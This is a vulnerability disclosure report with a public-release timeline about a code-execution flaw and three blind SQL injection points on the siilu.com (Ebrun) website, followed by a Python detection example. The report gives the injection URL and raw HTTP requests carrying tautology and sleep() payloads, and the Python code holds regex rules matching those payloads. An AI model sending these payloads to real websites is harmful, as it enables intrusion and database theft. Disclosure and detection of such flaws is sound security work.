2013-03-15: Details reported to the vendor, awaiting vendor response
2013-03-19: Vendor confirmed; details disclosed to the vendor only
2013-03-29: Details disclosed to core white hats and experts in related fields
2013-04-08: Details disclosed to regular white hats
2013-04-18: Details disclosed to intern white hats
2013-04-29: Details disclosed to the public
Code execution vulnerability on a 亿邦动力网 (Ebrun) website
Code execution vulnerability:
http://www.siilu.com//shop/100501/infocase/%24%7b%40print(md5(admin))%7d
Three SQL blind injection points:
POST /companyuser/dob2b HTTP/1.1
Content-Length: 1540
Content-Type: multipart/form-data; boundary=-----AcunetixBoundary_FBRHYGUKBC
X-Requested-With: XMLHttpRequest
Referer: http://www.siilu.com:80/
Cookie: PHPSESSID=cet3a4cnvel0sr6ir27b9uho63; trackType=1; CNZZDATA30060705=cnzz_eid%3D228405673-1363322969-http%253A%252F%252Fwww.siilu.com%26ntime%3D1363322969%26cnzz_a%3D0%26retime%3D1363323541112%26sin%3Djavascript%253AbiPlCPG4g9y5YLZj()%253C%253E%26ltime%3D1363323541112%26rtime%3D0
Host: www.siilu.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept: */*
Content-Type: multipart/form-data; boundary=-----AcunetixBoundary_IXNSIQEDQH

-------AcunetixBoundary_IXNSIQEDQH
Content-Disposition: form-data; name="city"

0
-------AcunetixBoundary_IXNSIQEDQH
Content-Disposition: form-data; name="company_site"

Acunetix
-------AcunetixBoundary_IXNSIQEDQH
Content-Disposition: form-data; name="contact"

1
-------AcunetixBoundary_IXNSIQEDQH
Content-Disposition: form-data; name="mail"

[email protected]
-------AcunetixBoundary_IXNSIQEDQH
Content-Disposition: form-data; name="pass2"

g00dPa$$w0rD
-------AcunetixBoundary_IXNSIQEDQH
Content-Disposition: form-data; name="pass_word"

g00dPa$$w0rD
-------AcunetixBoundary_IXNSIQEDQH
Content-Disposition: form-data; name="phone"

555-666-0606
-------AcunetixBoundary_IXNSIQEDQH
Content-Disposition: form-data; name="phone1"

555-666-0606
-------AcunetixBoundary_IXNSIQEDQH
Content-Disposition: form-data; name="province"

0
-------AcunetixBoundary_IXNSIQEDQH
Content-Disposition: form-data; name="qq"

1
-------AcunetixBoundary_IXNSIQEDQH
Content-Disposition: form-data; name="telphone"

555-666-0606
-------AcunetixBoundary_IXNSIQEDQH
Content-Disposition: form-data; name="usertype"

-------AcunetixBoundary_IXNSIQEDQH
Content-Disposition: form-data; name="user_name"

kgoyghag' or (sleep(2)+1) limit 1 -- 
-------AcunetixBoundary_IXNSIQEDQH
Content-Disposition: form-data; name="__hash__"

54c0fa6632d2db7653113cafae62bb45
-------AcunetixBoundary_IXNSIQEDQH
Content-Disposition: form-data; name="logo"; filename=""
Content-Type: 

-------AcunetixBoundary_IXNSIQEDQH--
http://www.siilu.com/index/clue?clueid=-1%20or%2011=11
GET /product/topcategory/?category_id=-1'%20or%20'91'%3d'92&city=&pagenum=4&sorted= HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://www.siilu.com:80/
Cookie: PHPSESSID=cet3a4cnvel0sr6ir27b9uho63; trackType=1; CNZZDATA30060705=cnzz_eid%3D228405673-1363322969-http%253A%252F%252Fwww.siilu.com%26ntime%3D1363322969%26cnzz_a%3D0%26retime%3D1363323541112%26sin%3Djavascript%253AbiPlCPG4g9y5YLZj()%253C%253E%26ltime%3D1363323541112%26rtime%3D0
Host: www.siilu.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept: */*
GET /ques/getfaq/?f=ajax&quesid=-1%20or%20100%3d98 HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://www.siilu.com:80/
Cookie: PHPSESSID=cet3a4cnvel0sr6ir27b9uho63; trackType=1; CNZZDATA30060705=cnzz_eid%3D228405673-1363322969-http%253A%252F%252Fwww.siilu.com%26ntime%3D1363322969%26cnzz_a%3D0%26retime%3D1363323541112%26sin%3Djavascript%253AbiPlCPG4g9y5YLZj()%253C%253E%26ltime%3D1363323541112%26rtime%3D0
Host: www.siilu.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept: */*
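As an added detection example (not part of the original report or the vendor's code), the following Python flags the two request patterns documented above when run over the report's own request targets, embedded here as constructed samples: the decoded `${@...}` expression in the URL path, and the `or N=N` / `sleep()` fragments in query and form parameters. The rule names are labels chosen for this example.

```python
import re
from urllib.parse import parse_qsl, unquote

# Rule names are this example's own labels, one per defect class in the report.
RULES = {
    # "${@...}" expression in a URL (the /infocase code-execution URL, once decoded)
    "php_expression_injection": re.compile(r"\$\{\s*@"),
    # "or 11=11" / "' or '91'='92" tautologies (the three blind SQL injection points)
    "sqli_boolean": re.compile(r"(?i)(?:^|[\s'\"()])or\s+'?\w+'?\s*=\s*'?\w+"),
    # sleep()-based delay (the user_name field of the multipart POST)
    "sqli_time_based": re.compile(r"(?i)\bsleep\s*\("),
}

def classify(decoded):
    """Return the names of all rules matching one already URL-decoded value."""
    return sorted(name for name, rx in RULES.items() if rx.search(decoded))

def inspect_request(target, form_fields=None):
    """Check a request target (path plus query string) and optional form fields.

    Returns (location, rule) pairs; an empty list means nothing matched.
    Each value is decoded exactly once before matching (parse_qsl decodes
    query values itself; the path is decoded here)."""
    path, _, query = target.partition("?")
    findings = [("path", rule) for rule in classify(unquote(path))]
    for name, value in parse_qsl(query, keep_blank_values=True):
        findings += [(f"query:{name}", rule) for rule in classify(value)]
    for name, value in (form_fields or {}).items():
        findings += [(f"form:{name}", rule) for rule in classify(value)]
    return findings

# Constructed sample set: the request targets quoted in this report plus one benign request.
SAMPLES = [
    ("/shop/100501/infocase/%24%7b%40print(md5(admin))%7d", None),
    ("/index/clue?clueid=-1%20or%2011=11", None),
    ("/product/topcategory/?category_id=-1'%20or%20'91'%3d'92&city=&pagenum=4&sorted=", None),
    ("/ques/getfaq/?f=ajax&quesid=-1%20or%20100%3d98", None),
    ("/companyuser/dob2b", {"user_name": "kgoyghag' or (sleep(2)+1) limit 1 -- ", "city": "0"}),
    ("/product/topcategory/?category_id=12&city=&pagenum=4&sorted=", None),
]

if __name__ == "__main__":
    for target, fields in SAMPLES:
        print(target, "->", inspect_request(target, fields) or "clean")
```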
Severity: Medium
Vulnerability Rank: 6
Confirmed: 2013-03-19 12:58
Thanks to lucky
None yet